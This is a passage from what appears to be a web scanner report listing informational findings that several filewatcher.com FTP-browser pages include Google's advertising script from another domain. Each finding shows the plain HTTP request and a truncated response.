Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.ps.pl/dsk0/ftp.openbsd.org/snapshots/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0Gp7jj4drNvFVjFCgzKSEw"
Content-Length: 15413
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 698
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.ps.pl/dsk0/ftp.openbsd.org/s
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.902. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z1mxB9md+IndS0h5csRrVQ"
Content-Length: 10873
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 614
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/ - FTP Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.903. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au/freebsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8XNL03R5w704rqsk8CmNFQ"
Content-Length: 13641
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 617
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.904. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2oOU8S9vCe+Wc3dFuUvAIA"
Content-Length: 7685
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 621
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.905. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZBeQaVacd8y4H1gMZgjjpA"
Content-Length: 5856
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 623
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.906. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "NBlq4wWpIJY9oFQQmi4rvA"
Content-Length: 24595
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 626
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.907. http://www.filewatcher.com/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.swin.edu.au/freebsd/ports/alpha/packages-5-current/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sevXUqTGm6Ox9/rvWjCFgQ"
Content-Length: 19429
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 626
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.swin.edu.au/freebsd/ports/al
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.908. http://www.filewatcher.com/b/ftp/ftp.uar.net.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uar.net.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "R0ojvCkinrXDBUlfbc9wlg"
Content-Length: 6032
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/ - FTP Browser</titl
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.909. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uar.net/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YZYkFvwnVGBDrGWyqnjOpQ"
Content-Length: 11764
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 626
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/ - FTP Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.910. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "mXURNGJX9gVhzIj0MzkA0A"
Content-Length: 12443
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 626
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.911. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fMnyvSQoCF+28XYt4/aytw"
Content-Length: 22532
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 629
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/packages
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.912. http://www.filewatcher.com/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ofx+BlY29SFGSchrgl4/fw"
Content-Length: 18297
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 633
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/packages
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.913. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3FKR//M/VzO0ybVLDQ88UA"
Content-Length: 5268
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 739
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/ - FTP Brow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.914. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3r4nAIWyHdvjLGDtk87Ktw"
Content-Length: 6439
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 739
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.915. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "A9Vsf4u4r6+MZ7t0Hz3QMQ"
Content-Length: 5544
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 740
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.916. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JmFdxcgVZskOzsQCBBoAHw"
Content-Length: 5463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 744
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.917. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XVyeOF5m9cgFghmHcAFtDA"
Content-Length: 6787
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 747
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.918. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nQ3t6ZBxUCns3nj+xErLDA"
Content-Length: 7675
